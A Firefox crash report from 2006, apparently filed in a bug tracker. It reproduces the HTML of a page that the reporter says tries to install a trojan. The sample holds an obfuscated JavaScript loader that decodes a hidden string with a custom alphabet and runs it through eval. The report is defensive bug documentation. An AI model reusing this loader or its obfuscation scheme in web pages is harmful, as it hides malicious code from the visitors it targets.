Crash with no feedback
User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.6) Gecko/20060728 Firefox/1.5.0.6
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.6) Gecko/20060728 Firefox/1.5.0.6

Firefox literally disappears after javascript execution.
The url provided seems to try to install a virus (IE downloads an executable containing a trojan)
I've tryed both on Windows XP (with Firefox 1.5.0.6) and on Windows 2000 (with Firefox 1.5.0.7) with the same result

Reproducible: Always

Steps to Reproduce:
1. open url above or html file containing html code above

Actual Results:  
Application disappears

Expected Results:  
it should show an error

html below reproduces error:


<HTML><HEAD>
<BODY>
<SCRIPT LANGUAGE="Javascript">
function e(kI,d)
{
 if(!d)
 {
  d='Cy*hc1aZ2!|WLD30J-H/gSr.BAVM9Ke_Etjp7vonI6O4#=i]zd);b?%FU@s+&G:^';
 }
 var L;
 var cX='';
 for(var g=0; g<kI.length; g+=arguments.callee.toString().replace(/\s/g,'').length-535)
 {
  L=(d.indexOf(kI.charAt(g))&255)<<18 |
    (d.indexOf(kI.charAt(g+1))&255)<<12|
   (d.indexOf(kI.charAt(g+2))&255)<<(arguments.callee.toString().replace(/\s/g,'').length-533)| 
			d.indexOf(kI.charAt(g+3))&255;
		cX+=String.fromCharCode((L&16711680)>>16,(L&65280)>>8,L&255);
	}
eval(cX.substring(0,cX.length-(arguments.callee.toString().replace(/\s/g,'').length-537)));
}
e('AaGpKr?vMnJiKF!6KagI!;d/J?!!g1JE/c13-?Sy-bgG276tKo1;BF!69ZJj21DHJ;bjVZ-b9hI]W%6;WnypAr2iB%L]Br-%A.!bV.66Mo9]Vr@7A.EiVZ-=MhG)ArBG!)=7M%D?MrSiK*@)ArAv9n!v9j#n2pU&W)94!FDp9ovzKhUn|/#E2*CE');
</SCRIPT>
<br>
PIPPO
</BODY></HTML>